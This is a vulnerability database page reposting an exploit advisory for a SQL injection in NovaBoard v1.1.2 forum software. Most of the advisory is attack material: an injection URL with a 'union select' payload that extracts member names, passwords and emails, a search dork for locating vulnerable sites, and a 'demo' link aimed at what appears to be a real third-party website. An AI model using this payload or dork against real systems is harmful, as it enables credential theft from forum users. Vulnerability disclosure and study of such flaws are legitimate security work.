|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Delibey SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : ############################################################# # NovaBoard v1.1.2 SQL Injection Vulnerability # Plugin Home: http://www.novaboard.net/ # Author: Delibey # Site: www.1923turk.com ############################################################## # Download Script : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip # Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&a mp;forums[1923Turk]=[SQL-inj] # 1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+no vaboard_members+--+ # Dork : "Powered by NovaBoard v1.1.2" # Demo: http://livingtheprofs.nl/index.php?page=search&topic=1&pf=1&sea rch=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat _ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+ ############################################################## # Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO ############################################################## Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |